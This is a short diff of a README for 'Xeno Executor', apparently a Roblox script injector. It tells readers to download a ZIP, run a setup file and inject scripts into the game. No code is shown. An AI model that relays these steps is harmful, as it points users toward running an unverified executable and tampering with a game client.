just-cmd-1909/Xeno-Executor/README.md

 1. **Click the “Download” button** above to get the ZIP file.
 2. Extract the files to a secure folder on your PC.
-3. Open Xeno Executor and follow the on-screen setup guide.
+3. Open Xeno Setup File and then run Xeno.
 4. Load your favorite script, inject, and enjoy a next-level Roblox experience! 🎉

 ---